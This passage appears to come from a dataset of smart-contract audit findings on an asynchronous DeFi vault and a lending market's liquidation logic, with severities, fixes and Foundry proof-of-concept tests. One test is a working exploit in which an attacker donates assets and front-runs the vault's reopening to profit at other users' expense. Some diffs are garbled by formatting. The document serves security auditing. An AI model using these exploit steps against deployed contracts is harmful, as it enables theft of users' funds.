uint256 lastRequestId = lastRedeemRequestId[owner];\\n uint256 shares = epochs[lastRequestId].redeemRequestBalance[owner];\\n epochs[lastRequestId].redeemRequestBalance[owner] = 0;\\n _asset.safeTransferFrom(address(claimableSilo), address(this), assets);\\n _asset.transfer(receiver, assets);\\n emit ClaimRedeem(lastRequestId, owner, receiver, assets, shares);\\n }\\n```\\n","CRITICAL. Requests can be wiped by executing the claim in an unsettled epoch, leading to loss of funds. 
The issue can also be triggered for any arbitrary account by using `claimAndRequestDeposit()`.","```\\nfunction _claimDeposit(\\n address owner,\\n address receiver\\n)\\n internal\\n returns (uint256 shares)\\n{\\n shares = previewClaimDeposit(owner);\\n\\n uint256 lastRequestId = lastDepositRequestId[owner];\\n uint256 assets = epochs[lastRequestId].depositRequestBalance[owner];\\n epochs[lastRequestId].depositRequestBalance[owner] = 0;\\n _update(address(claimableSilo), receiver, shares);\\n emit ClaimDeposit(lastRequestId, owner, receiver, assets, shares);\\n}\\n\\nfunction previewClaimDeposit(address owner) public view returns (uint256) {\\n uint256 lastRequestId = lastDepositRequestId[owner];\\n uint256 assets = epochs[lastRequestId].depositRequestBalance[owner];\\n return _convertToShares(assets, lastRequestId, Math.Rounding.Floor);\\n}\\n\\nfunction _convertToShares(\\n uint256 assets,\\n uint256 requestId,\\n Math.Rounding rounding\\n)\\n internal\\n view\\n returns (uint256)\\n{\\n if (isCurrentEpoch(requestId)) {\\n return 0;\\n }\\n uint256 totalAssets =\\n epochs[requestId].totalAssetsSnapshotForDeposit + 1;\\n uint256 totalSupply =\\n epochs[requestId].totalSupplySnapshotForDeposit + 1;\\n\\n return assets.mulDiv(totalSupply, totalAssets, rounding);\\n}\\n```\\n" +Calling `requestRedeem` with `_msgSender() != owner` will lead to user's shares being locked in the vault forever,high,"The `requestRedeem` function in `AsyncSynthVault.sol` can be invoked by a user on behalf of another user, referred to as 'owner', provided that the user has been granted sufficient allowance by the 'owner'. However, this action results in a complete loss of balance.\\nThe `_createRedeemRequest` function contains a discrepancy; it fails to update the `lastRedeemRequestId` for the user eligible to claim the shares upon maturity. Instead, it updates this identifier for the 'owner' who delegated their shares to the user. 
As a result, the shares become permanently locked in the vault, rendering them unclaimable by either the 'owner' or the user.\\nThis issue unfolds as follows:\\nThe 'owner' deposits tokens into the vault, receiving vault `shares` in return.\\nThe 'owner' then delegates the allowance of all their vault `shares` to another user.\\nWhen `epochId == 1`, this user executes The `requestRedeem` , specifying the 'owner''s address as `owner`, the user's address as `receiver`, and the 'owner''s share balance as `shares`.\\nThe internal function `_createRedeemRequest` is invoked, incrementing `epochs[epochId].redeemRequestBalance[receiver]` by the amount of `shares`, and setting `lastRedeemRequestId[owner] = epochId`.\\nAt `epochId == 2`, the user calls `claimRedeem`, which in turn calls the internal function `_claimRedeem`, with `owner` set to `_msgSender()` (i.e., the user's address) and `receiver` also set to the user's address.\\nIn this scenario, `lastRequestId` remains zero because `lastRedeemRequestId[owner] == 0` (here, `owner` refers to the user's address). Consequently, `epochs[lastRequestId].redeemRequestBalance[owner]` is also zero. 
Therefore, no `shares` are minted to the user.\\nProof of Code :\\nThe following test demonstrates the claim made above :\\n```\\nfunction test_poc() external {\\n // set token balances\\n deal(vaultTested.asset(), user1.addr, 20); // owner\\n\\n vm.startPrank(user1.addr);\\n IERC20Metadata(vaultTested.asset()).approve(address(vaultTested), 20);\\n // owner deposits tokens when vault is open and receives vault shares\\n vaultTested.deposit(20, user1.addr);\\n // owner delegates shares balance to user\\n IERC20Metadata(address(vaultTested)).approve(\\n user2.addr,\\n vaultTested.balanceOf(user1.addr)\\n );\\n vm.stopPrank();\\n\\n // vault is closed\\n vm.prank(vaultTested.owner());\\n vaultTested.close();\\n\\n // epoch = 1\\n vm.startPrank(user2.addr);\\n // user requests a redeem on behlaf of owner\\n vaultTested.requestRedeem(\\n vaultTested.balanceOf(user1.addr),\\n user2.addr,\\n user1.addr,\\n """"\\n );\\n // user checks the pending redeem request amount\\n assertEq(vaultTested.pendingRedeemRequest(user2.addr), 20);\\n vm.stopPrank();\\n\\n vm.startPrank(vaultTested.owner());\\n IERC20Metadata(vaultTested.asset()).approve(\\n address(vaultTested),\\n type(uint256).max\\n );\\n vaultTested.settle(23); // an epoch goes by\\n vm.stopPrank();\\n\\n // epoch = 2\\n\\n vm.startPrank(user2.addr);\\n // user tries to claim the redeem\\n vaultTested.claimRedeem(user2.addr);\\n assertEq(IERC20Metadata(vaultTested.asset()).balanceOf(user2.addr), 0);\\n // however, token balance of user is still empty\\n vm.stopPrank();\\n\\n vm.startPrank(user1.addr);\\n // owner also tries to claim the redeem\\n vaultTested.claimRedeem(user1.addr);\\n assertEq(IERC20Metadata(vaultTested.asset()).balanceOf(user1.addr), 0);\\n // however, token balance of owner is still empty\\n vm.stopPrank();\\n\\n // all the balances of owner and user are zero, indicating loss of funds\\n assertEq(vaultTested.balanceOf(user1.addr), 0);\\n 
assertEq(IERC20Metadata(vaultTested.asset()).balanceOf(user1.addr), 0);\\n assertEq(vaultTested.balanceOf(user2.addr), 0);\\n assertEq(IERC20Metadata(vaultTested.asset()).balanceOf(user2.addr), 0);\\n }\\n```\\n\\nTo run the test :\\nCopy the above code and paste it into `TestClaimDeposit.t.sol`\\nRun `forge test --match-test test_poc --ffi`",Modify `_createRedeemRequest` as follows :\\n```\\n// Remove the line below\\n lastRedeemRequestId[owner] = epochId;\\n// Add the line below\\n lastRedeemRequestid[receiver] = epochId;\\n```\\n,The shares are locked in the vault forever with no method for recovery by the user or the 'owner'.,"```\\nfunction test_poc() external {\\n // set token balances\\n deal(vaultTested.asset(), user1.addr, 20); // owner\\n\\n vm.startPrank(user1.addr);\\n IERC20Metadata(vaultTested.asset()).approve(address(vaultTested), 20);\\n // owner deposits tokens when vault is open and receives vault shares\\n vaultTested.deposit(20, user1.addr);\\n // owner delegates shares balance to user\\n IERC20Metadata(address(vaultTested)).approve(\\n user2.addr,\\n vaultTested.balanceOf(user1.addr)\\n );\\n vm.stopPrank();\\n\\n // vault is closed\\n vm.prank(vaultTested.owner());\\n vaultTested.close();\\n\\n // epoch = 1\\n vm.startPrank(user2.addr);\\n // user requests a redeem on behlaf of owner\\n vaultTested.requestRedeem(\\n vaultTested.balanceOf(user1.addr),\\n user2.addr,\\n user1.addr,\\n """"\\n );\\n // user checks the pending redeem request amount\\n assertEq(vaultTested.pendingRedeemRequest(user2.addr), 20);\\n vm.stopPrank();\\n\\n vm.startPrank(vaultTested.owner());\\n IERC20Metadata(vaultTested.asset()).approve(\\n address(vaultTested),\\n type(uint256).max\\n );\\n vaultTested.settle(23); // an epoch goes by\\n vm.stopPrank();\\n\\n // epoch = 2\\n\\n vm.startPrank(user2.addr);\\n // user tries to claim the redeem\\n vaultTested.claimRedeem(user2.addr);\\n assertEq(IERC20Metadata(vaultTested.asset()).balanceOf(user2.addr), 0);\\n // however, 
token balance of user is still empty\\n vm.stopPrank();\\n\\n vm.startPrank(user1.addr);\\n // owner also tries to claim the redeem\\n vaultTested.claimRedeem(user1.addr);\\n assertEq(IERC20Metadata(vaultTested.asset()).balanceOf(user1.addr), 0);\\n // however, token balance of owner is still empty\\n vm.stopPrank();\\n\\n // all the balances of owner and user are zero, indicating loss of funds\\n assertEq(vaultTested.balanceOf(user1.addr), 0);\\n assertEq(IERC20Metadata(vaultTested.asset()).balanceOf(user1.addr), 0);\\n assertEq(vaultTested.balanceOf(user2.addr), 0);\\n assertEq(IERC20Metadata(vaultTested.asset()).balanceOf(user2.addr), 0);\\n }\\n```\\n" +"Exchange rate is calculated incorrectly when the vault is closed, potentially leading to funds being stolen",high,"The exchange ratio between shares and assets is calculated incorrectly when the vault is closed. This can cause accounting inconsistencies, funds being stolen and users being unable to redeem shares.\\nThe functions AsyncSynthVault::_convertToAssets and AsyncSynthVault::_convertToShares both add `1` to the epoch cached variables `totalAssetsSnapshotForDeposit`, `totalSupplySnapshotForDeposit`, `totalAssetsSnapshotForRedeem` and `totalSupplySnapshotForRedeem`.\\nThis is incorrect because the function previewSettle, used in _settle(), already adds `1` to the variables:\\n```\\n// rest of code\\nuint256 totalAssetsSnapshotForDeposit = _lastSavedBalance + 1;\\nuint256 totalSupplySnapshotForDeposit = totalSupply + 1;\\n// rest of code\\nuint256 totalAssetsSnapshotForRedeem = _lastSavedBalance + pendingDeposit + 1;\\nuint256 totalSupplySnapshotForRedeem = totalSupply + sharesToMint + 1;\\n// rest of code\\n```\\n\\nThis leads to accounting inconsistencies between depositing/redeeming when a vault is closed and depositing/redeeming when a vault is open whenever the exchange ratio assets/shares is not exactly 1:1.\\nIf a share is worth more than one asset:\\nUsers that will request a deposit while the 
vault is closed will receive more shares than they should\\nUsers that will request a redeem while the vault is closed will receive less assets than they should\\nPOC\\nThis can be taken advantage of by an attacker by doing the following:\\nThe attacker monitors the mempool for a vault deployment.\\nBefore the vault is deployed the attacker transfers to the vault some of the vault underlying asset (donation). This increases the value of one share.\\nThe protocol team initializes the vault and adds the bootstrap liquidity.\\nUsers use the protocol normally and deposits some assets.\\nThe vault gets closed by the protocol team and the funds invested.\\nSome users request a deposit while the vault is closed.\\nThe attacker monitors the mempool to know when the vault will be open again.\\nRight before the vault is opened, the attacker performs multiple deposit requests with different accounts. For each account he deposits the minimum amount of assets required to receive 1 share.\\nThe vault opens.\\nThe attacker claims all of the deposits with every account and then redeems the shares immediately for profit.\\nThis will ""steal"" shares of other users (point 6) from the claimable silo because the protocol will give the attacker more shares than it should. 
The attacker will profit and some users won't be able to claim their shares.\\nAdd imports to TestClaimRedeem.t.sol:\\n```\\nimport { IERC20 } from ""@openzeppelin/contracts/token/ERC20/IERC20.sol"";\\n```\\n\\nand copy-paste:\\n```\\nfunction test_attackerProfitsViaRequestingDeposits() external {\\n address attacker = makeAddr(""attacker"");\\n address protocolUsers = makeAddr(""alice"");\\n address vaultOwner = vaultTested.owner();\\n\\n uint256 donation = 1e18 - 1;\\n uint256 protocolUsersDeposit = 10e18 + 15e18;\\n uint256 protocolTeamBootstrapDeposit = 1e18;\\n\\n IERC20 asset = IERC20(vaultTested.asset());\\n deal(address(asset), protocolUsers, protocolUsersDeposit);\\n deal(address(asset), attacker, donation);\\n deal(address(asset), vaultOwner, protocolTeamBootstrapDeposit);\\n\\n vm.prank(vaultOwner);\\n asset.approve(address(vaultTested), type(uint256).max);\\n\\n vm.prank(protocolUsers);\\n asset.approve(address(vaultTested), type(uint256).max);\\n\\n vm.prank(attacker);\\n asset.approve(address(vaultTested), type(uint256).max);\\n\\n //-> Attacker donates `1e18 - 1` assets, this can be done before the vault is even deployed\\n vm.prank(attacker);\\n asset.transfer(address(vaultTested), donation);\\n\\n //-> Protocol team bootstraps the vault with `1e18` of assets\\n vm.prank(vaultOwner);\\n vaultTested.deposit(protocolTeamBootstrapDeposit, vaultOwner);\\n \\n //-> Users deposit `10e18` of liquidity in the vault\\n vm.prank(protocolUsers);\\n vaultTested.deposit(10e18, protocolUsers);\\n\\n //-> Vault gets closed\\n vm.prank(vaultOwner);\\n vaultTested.close();\\n\\n //-> Users request deposits for `15e18` assets\\n vm.prank(protocolUsers);\\n vaultTested.requestDeposit(15e18, protocolUsers, protocolUsers, """");\\n\\n //-> The attacker frontruns the call to `open()` and knows that:\\n //- The current epoch cached `totalSupply` of shares will be `vaultTested.totalSupply()` + 1 + 1\\n //- The current epoch cached `totalAssets` will be 12e18 + 1 + 1\\n 
uint256 totalSupplyCachedOnOpen = vaultTested.totalSupply() + 1 + 1; //Current supply of shares, plus 1 used as virtual share, plus 1 added by `_convertToAssets`\\n uint256 totalAssetsCachedOnOpen = vaultTested.lastSavedBalance() + 1 + 1; //Total assets passed as paremeter to `open`, plus 1 used as virtual share, plus 1 added by `_convertToAssets`\\n uint256 minToDepositToGetOneShare = totalAssetsCachedOnOpen / totalSupplyCachedOnOpen;\\n\\n //-> Attacker frontruns the call to `open()` by requesting a deposit with multiple fresh accounts\\n uint256 totalDeposited = 0;\\n for(uint256 i = 0; i < 30; i++) {\\n address attackerEOA = address(uint160(i * 31000 + 49*49)); //Random address that does not conflict with existing ones\\n deal(address(asset), attackerEOA, minToDepositToGetOneShare);\\n vm.startPrank(attackerEOA);\\n asset.approve(address(vaultTested), type(uint256).max);\\n vaultTested.requestDeposit(minToDepositToGetOneShare, attackerEOA, attackerEOA, """");\\n vm.stopPrank();\\n totalDeposited += minToDepositToGetOneShare;\\n }\\n\\n //->Vault gets opened again with 0 profit and 0 losses (for simplicity)\\n vm.startPrank(vaultOwner);\\n vaultTested.open(vaultTested.lastSavedBalance());\\n vm.stopPrank();\\n\\n //-> Attacker claims his deposits and withdraws them immediately for profit\\n uint256 totalRedeemed = 0;\\n for(uint256 i = 0; i < 30; i++) {\\n address attackerEOA = address(uint160(i * 31000 + 49*49)); //Random address that does not conflict with existing ones\\n vm.startPrank(attackerEOA);\\n vaultTested.claimDeposit(attackerEOA);\\n uint256 assets = vaultTested.redeem(vaultTested.balanceOf(attackerEOA), attackerEOA, attackerEOA);\\n vm.stopPrank();\\n totalRedeemed += assets;\\n }\\n\\n //->❌ Attacker is in profit\\n assertGt(totalRedeemed, totalDeposited + donation);\\n}\\n```\\n",In the functions AsyncSynthVault::_convertToAssets and AsyncSynthVault::_convertToShares:\\nReturn `0` if `requestId == 0`\\nDon't add `1` to the two cached 
variables\\nIt's also a good idea to perform the initial bootstrapping deposit in the initialize function (as suggested in another finding) and require that the vault contains `0` assets when the first deposit is performed.,"When the ratio between shares and assets is not 1:1 the protocol calculates the exchange rate between assets and shares inconsitently. This is an issue by itself and can lead to loss of funds and users not being able to claim shares. It can also be taken advantage of by an attacker to steal shares from the claimable silo.\\nNote that the ""donation"" done initially is not akin to an ""inflation"" attack because the attacker is not required to mint any share.",```\\n// rest of code\\nuint256 totalAssetsSnapshotForDeposit = _lastSavedBalance + 1;\\nuint256 totalSupplySnapshotForDeposit = totalSupply + 1;\\n// rest of code\\nuint256 totalAssetsSnapshotForRedeem = _lastSavedBalance + pendingDeposit + 1;\\nuint256 totalSupplySnapshotForRedeem = totalSupply + sharesToMint + 1;\\n// rest of code\\n```\\n +The `_zapIn` function may unexpectedly revert due to the incorrect implementation of `_transferTokenInAndApprove`,medium,"The `_transferTokenInAndApprove` function should approve the `router` on behalf of the VaultZapper contract. However, it checks the allowance from `msgSender` to the `router`, rather than the VaultZapper. This potentially results in the VaultZapper not approving the `router` and causing unexpected reverting.\\nThe allowance check in the `_transferTokenInAndApprove` function should verify that `address(this)` has approved sufficient amount of `tokenIn` to the `router`. 
However, it currently checks the allowance of `_msgSender()`, which is unnecessary and may cause transaction reverting if `_msgSender` had previously approved the `router`.\\n```\\n function _transferTokenInAndApprove(\\n address router,\\n IERC20 tokenIn,\\n uint256 amount\\n )\\n internal\\n {\\n tokenIn.safeTransferFrom(_msgSender(), address(this), amount);\\n//@ The check of allowance is useless, we should check the allowance from address(this) rather than the msgSender\\n if (tokenIn.allowance(_msgSender(), router) < amount) {\\n tokenIn.forceApprove(router, amount);\\n }\\n }\\n```\\n\\nPOC\\nApply the patch to `asynchronous-vault/test/Zapper/ZapperDeposit.t.sol` to add the test case and run it with `forge test --match-test test_zapIn --ffi`.\\n```\\ndiff --git a/asynchronous-vault/test/Zapper/ZapperDeposit.t.sol b/asynchronous-vault/test/Zapper/ZapperDeposit.t.sol\\nindex 9083127..ff11b56 100644\\n--- a/asynchronous-vault/test/Zapper/ZapperDeposit.t.sol\\n// Add the line below\\n// Add the line below\\n// Add the line below\\n b/asynchronous-vault/test/Zapper/ZapperDeposit.t.sol\\n@@ -17,6 // Add the line below\\n17,25 @@ contract VaultZapperDeposit is OffChainCalls {\\n zapper = new VaultZapper();\\n }\\n\\n// Add the line below\\n function test_zapIn() public {\\n// Add the line below\\n Swap memory params =\\n// Add the line below\\n Swap(_router, _USDC, _WSTETH, 1500 * 1e6, 1, address(0), 20);\\n// Add the line below\\n _setUpVaultAndZapper(_WSTETH);\\n// Add the line below\\n\\n// Add the line below\\n IERC4626 vault = _vault;\\n// Add the line below\\n bytes memory swapData =\\n// Add the line below\\n _getSwapData(address(zapper), address(zapper), params);\\n// Add the line below\\n\\n// Add the line below\\n _getTokenIn(params);\\n// Add the line below\\n\\n// Add the line below\\n // If the msgSender() happend to approve the SwapRouter before, then the zap will always revert\\n// Add the line below\\n 
IERC20(params.tokenIn).approve(address(params.router), params.amount);\\n// Add the line below\\n zapper.zapAndDeposit(\\n// Add the line below\\n params.tokenIn, vault, params.router, params.amount, swapData\\n// Add the line below\\n );\\n// Add the line below\\n\\n// Add the line below\\n }\\n// Add the line below\\n\\n //// test_zapAndDeposit ////\\n function test_zapAndDepositUsdcWSTETH() public {\\n Swap memory usdcToWstEth =\\n```\\n\\nResult:\\n```\\nRan 1 test for test/Zapper/ZapperDeposit.t.sol:VaultZapperDeposit\\n[FAIL. Reason: SwapFailed(""\\u{8}�y�\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0 \\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0(ERC20: transfer amount exceeds allowance\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0"")] test_zapIn() (gas: 4948462)\\nSuite result: FAILED. 0 passed; 1 failed; 0 skipped; finished in 20.84s (18.74s CPU time)\\n\\nRan 1 test suite in 22.40s (20.84s CPU time): 0 tests passed, 1 failed, 0 skipped (1 total tests)\\n\\nFailing tests:\\nEncountered 1 failing test in test/Zapper/ZapperDeposit.t.sol:VaultZapperDeposit\\n[FAIL. 
Reason: SwapFailed(""\\u{8}�y�\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0 \\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0(ERC20: transfer amount exceeds allowance\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0"")] test_zapIn() (gas: 4948462)\\n```\\n","Fix the issue:\\n```\\ndiff // Remove the line below\\n// Remove the line below\\ngit a/asynchronous// Remove the line below\\nvault/src/VaultZapper.sol b/asynchronous// Remove the line below\\nvault/src/VaultZapper.sol\\nindex 9943535..9cf6df9 100644\\n// Remove the line below\\n// Remove the line below\\n// Remove the line below\\n a/asynchronous// Remove the line below\\nvault/src/VaultZapper.sol\\n// Add the line below\\n// Add the line below\\n// Add the line below\\n b/asynchronous// Remove the line below\\nvault/src/VaultZapper.sol\\n@@ // Remove the line below\\n165,7 // Add the line below\\n165,7 @@ contract VaultZapper is Ownable2Step, Pausable {\\n internal\\n {\\n tokenIn.safeTransferFrom(_msgSender(), address(this), amount);\\n// Remove the line below\\n if (tokenIn.allowance(_msgSender(), router) < amount) {\\n// Add the line below\\n if (tokenIn.allowance(address(this), router) < amount) {\\n tokenIn.forceApprove(router, amount);\\n }\\n }\\n```\\n","This issue could lead to transaction reverting when users interact with the contract normally, thereby affecting the contract's regular functionality.","```\\n function _transferTokenInAndApprove(\\n address router,\\n IERC20 tokenIn,\\n uint256 amount\\n )\\n internal\\n {\\n tokenIn.safeTransferFrom(_msgSender(), address(this), amount);\\n//@ The check of allowance is useless, we should check the allowance from address(this) rather than the msgSender\\n if (tokenIn.allowance(_msgSender(), router) < amount) {\\n tokenIn.forceApprove(router, amount);\\n }\\n }\\n```\\n" +Unupdated totalBorrow After BigBang Liquidation,high,"During the 
liquidation process, BigBang only reduces the user's `userBorrowPart[user]`, but fails to update the global `totalBorrow`. Consequently, all subsequent debt calculations are incorrect.\\nCurrently, the implementation relies on the `BBLiquidation._updateBorrowAndCollateralShare()` method to calculate user debt repayment and collateral collection. The code snippet is as follows:\\n```\\n function _liquidateUser(\\n address user,\\n uint256 maxBorrowPart,\\n IMarketLiquidatorReceiver _liquidatorReceiver,\\n bytes calldata _liquidatorReceiverData,\\n uint256 _exchangeRate,\\n uint256 minLiquidationBonus\\n ) private {\\n uint256 callerReward = _getCallerReward(user, _exchangeRate);\\n\\n (uint256 borrowAmount,, uint256 collateralShare) =\\n _updateBorrowAndCollateralShare(user, maxBorrowPart, minLiquidationBonus, _exchangeRate);\\n totalCollateralShare = totalCollateralShare > collateralShare ? totalCollateralShare - collateralShare : 0;\\n uint256 borrowShare = yieldBox.toShare(assetId, borrowAmount, true);\\n\\n (uint256 returnedShare,) =\\n _swapCollateralWithAsset(collateralShare, _liquidatorReceiver, _liquidatorReceiverData);\\n if (returnedShare < borrowShare) revert AmountNotValid();\\n\\n (uint256 feeShare, uint256 callerShare) = _extractLiquidationFees(returnedShare, borrowShare, callerReward);\\n\\n IUsdo(address(asset)).burn(address(this), borrowAmount);\\n\\n address[] memory _users = new address[](1);\\n _users[0] = user;\\n emit Liquidated(msg.sender, _users, callerShare, feeShare, borrowAmount, collateralShare);\\n }\\n\\n function _updateBorrowAndCollateralShare(\\n address user,\\n uint256 maxBorrowPart,\\n uint256 minLiquidationBonus, // min liquidation bonus to accept (default 0)\\n uint256 _exchangeRate\\n ) private returns (uint256 borrowAmount, uint256 borrowPart, uint256 collateralShare) {\\n if (_exchangeRate == 0) revert ExchangeRateNotValid();\\n\\n // get collateral amount in asset's value\\n uint256 collateralPartInAsset = (\\n 
yieldBox.toAmount(collateralId, userCollateralShare[user], false) * EXCHANGE_RATE_PRECISION\\n ) / _exchangeRate;\\n\\n // compute closing factor (liquidatable amount)\\n uint256 borrowPartWithBonus =\\n computeClosingFactor(userBorrowPart[user], collateralPartInAsset, FEE_PRECISION_DECIMALS);\\n\\n // limit liquidable amount before bonus to the current debt\\n uint256 userTotalBorrowAmount = totalBorrow.toElastic(userBorrowPart[user], true);\\n borrowPartWithBonus = borrowPartWithBonus > userTotalBorrowAmount ? userTotalBorrowAmount : borrowPartWithBonus;\\n\\n // check the amount to be repaid versus liquidator supplied limit\\n borrowPartWithBonus = borrowPartWithBonus > maxBorrowPart ? maxBorrowPart : borrowPartWithBonus;\\n borrowAmount = borrowPartWithBonus;\\n\\n // compute part units, preventing rounding dust when liquidation is full\\n borrowPart = borrowAmount == userTotalBorrowAmount\\n ? userBorrowPart[user]\\n : totalBorrow.toBase(borrowPartWithBonus, false);\\n if (borrowPart == 0) revert Solvent();\\n\\n if (liquidationBonusAmount > 0) {\\n borrowPartWithBonus = borrowPartWithBonus + (borrowPartWithBonus * liquidationBonusAmount) / FEE_PRECISION;\\n }\\n\\n if (collateralPartInAsset < borrowPartWithBonus) {\\n if (collateralPartInAsset <= userTotalBorrowAmount) {\\n revert BadDebt();\\n }\\n // If current debt is covered by collateral fully\\n // then there is some liquidation bonus,\\n // so liquidation can proceed if liquidator's minimum is met\\n if (minLiquidationBonus > 0) {\\n // `collateralPartInAsset > borrowAmount` as `borrowAmount <= userTotalBorrowAmount`\\n uint256 effectiveBonus = ((collateralPartInAsset - borrowAmount) * FEE_PRECISION) / borrowAmount;\\n if (effectiveBonus < minLiquidationBonus) {\\n revert InsufficientLiquidationBonus();\\n }\\n collateralShare = userCollateralShare[user];\\n } else {\\n revert InsufficientLiquidationBonus();\\n }\\n } else {\\n collateralShare =\\n yieldBox.toShare(collateralId, (borrowPartWithBonus * 
_exchangeRate) / EXCHANGE_RATE_PRECISION, false);\\n if (collateralShare > userCollateralShare[user]) {\\n revert NotEnoughCollateral();\\n }\\n }\\n\\n userBorrowPart[user] -= borrowPart;\\n userCollateralShare[user] -= collateralShare;\\n }\\n```\\n\\nThe methods mentioned above update the user-specific variables `userBorrowPart[user]` and `userCollateralShare[user]` within the `_updateBorrowAndCollateralShare()` method. Additionally, the global variable `totalCollateralShare` is updated within the `_liquidateUser()` method.\\nHowever, there's another crucial global variable, `totalBorrow`, which remains unaltered throughout the entire liquidation process.\\nFailure to update `totalBorrow` during liquidation will result in incorrect subsequent loan-related calculations.\\nNote: SGL Liquidation has the same issues","```\\n function _liquidateUser(\\n address user,\\n uint256 maxBorrowPart,\\n IMarketLiquidatorReceiver _liquidatorReceiver,\\n bytes calldata _liquidatorReceiverData,\\n uint256 _exchangeRate,\\n uint256 minLiquidationBonus\\n ) private {\\n uint256 callerReward = _getCallerReward(user, _exchangeRate);\\n\\n// Remove the line below\\n (uint256 borrowAmount,, uint256 collateralShare) =\\n// Add the line below\\n (uint256 borrowAmount,uint256 borrowPart, uint256 collateralShare) =\\n _updateBorrowAndCollateralShare(user, maxBorrowPart, minLiquidationBonus, _exchangeRate);\\n totalCollateralShare = totalCollateralShare > collateralShare ? totalCollateralShare // Remove the line below\\n collateralShare : 0;\\n// Add the line below\\n totalBorrow.elastic // Remove the line below\\n= borrowAmount.toUint128();\\n// Add the line below\\n totalBorrow.base // Remove the line below\\n= borrowPart.toUint128();\\n```\\n","The lack of an update to `totalBorrow` during liquidation leads to inaccuracies in subsequent loan-related calculations. 
For instance, this affects interest accumulation and the amount of interest due.","```\\n function _liquidateUser(\\n address user,\\n uint256 maxBorrowPart,\\n IMarketLiquidatorReceiver _liquidatorReceiver,\\n bytes calldata _liquidatorReceiverData,\\n uint256 _exchangeRate,\\n uint256 minLiquidationBonus\\n ) private {\\n uint256 callerReward = _getCallerReward(user, _exchangeRate);\\n\\n (uint256 borrowAmount,, uint256 collateralShare) =\\n _updateBorrowAndCollateralShare(user, maxBorrowPart, minLiquidationBonus, _exchangeRate);\\n totalCollateralShare = totalCollateralShare > collateralShare ? totalCollateralShare - collateralShare : 0;\\n uint256 borrowShare = yieldBox.toShare(assetId, borrowAmount, true);\\n\\n (uint256 returnedShare,) =\\n _swapCollateralWithAsset(collateralShare, _liquidatorReceiver, _liquidatorReceiverData);\\n if (returnedShare < borrowShare) revert AmountNotValid();\\n\\n (uint256 feeShare, uint256 callerShare) = _extractLiquidationFees(returnedShare, borrowShare, callerReward);\\n\\n IUsdo(address(asset)).burn(address(this), borrowAmount);\\n\\n address[] memory _users = new address[](1);\\n _users[0] = user;\\n emit Liquidated(msg.sender, _users, callerShare, feeShare, borrowAmount, collateralShare);\\n }\\n\\n function _updateBorrowAndCollateralShare(\\n address user,\\n uint256 maxBorrowPart,\\n uint256 minLiquidationBonus, // min liquidation bonus to accept (default 0)\\n uint256 _exchangeRate\\n ) private returns (uint256 borrowAmount, uint256 borrowPart, uint256 collateralShare) {\\n if (_exchangeRate == 0) revert ExchangeRateNotValid();\\n\\n // get collateral amount in asset's value\\n uint256 collateralPartInAsset = (\\n yieldBox.toAmount(collateralId, userCollateralShare[user], false) * EXCHANGE_RATE_PRECISION\\n ) / _exchangeRate;\\n\\n // compute closing factor (liquidatable amount)\\n uint256 borrowPartWithBonus =\\n computeClosingFactor(userBorrowPart[user], collateralPartInAsset, FEE_PRECISION_DECIMALS);\\n\\n // limit 
liquidable amount before bonus to the current debt\\n uint256 userTotalBorrowAmount = totalBorrow.toElastic(userBorrowPart[user], true);\\n borrowPartWithBonus = borrowPartWithBonus > userTotalBorrowAmount ? userTotalBorrowAmount : borrowPartWithBonus;\\n\\n // check the amount to be repaid versus liquidator supplied limit\\n borrowPartWithBonus = borrowPartWithBonus > maxBorrowPart ? maxBorrowPart : borrowPartWithBonus;\\n borrowAmount = borrowPartWithBonus;\\n\\n // compute part units, preventing rounding dust when liquidation is full\\n borrowPart = borrowAmount == userTotalBorrowAmount\\n ? userBorrowPart[user]\\n : totalBorrow.toBase(borrowPartWithBonus, false);\\n if (borrowPart == 0) revert Solvent();\\n\\n if (liquidationBonusAmount > 0) {\\n borrowPartWithBonus = borrowPartWithBonus + (borrowPartWithBonus * liquidationBonusAmount) / FEE_PRECISION;\\n }\\n\\n if (collateralPartInAsset < borrowPartWithBonus) {\\n if (collateralPartInAsset <= userTotalBorrowAmount) {\\n revert BadDebt();\\n }\\n // If current debt is covered by collateral fully\\n // then there is some liquidation bonus,\\n // so liquidation can proceed if liquidator's minimum is met\\n if (minLiquidationBonus > 0) {\\n // `collateralPartInAsset > borrowAmount` as `borrowAmount <= userTotalBorrowAmount`\\n uint256 effectiveBonus = ((collateralPartInAsset - borrowAmount) * FEE_PRECISION) / borrowAmount;\\n if (effectiveBonus < minLiquidationBonus) {\\n revert InsufficientLiquidationBonus();\\n }\\n collateralShare = userCollateralShare[user];\\n } else {\\n revert InsufficientLiquidationBonus();\\n }\\n } else {\\n collateralShare =\\n yieldBox.toShare(collateralId, (borrowPartWithBonus * _exchangeRate) / EXCHANGE_RATE_PRECISION, false);\\n if (collateralShare > userCollateralShare[user]) {\\n revert NotEnoughCollateral();\\n }\\n }\\n\\n userBorrowPart[user] -= borrowPart;\\n userCollateralShare[user] -= collateralShare;\\n }\\n```\\n" +"`_computeClosingFactor` function will return incorrect 
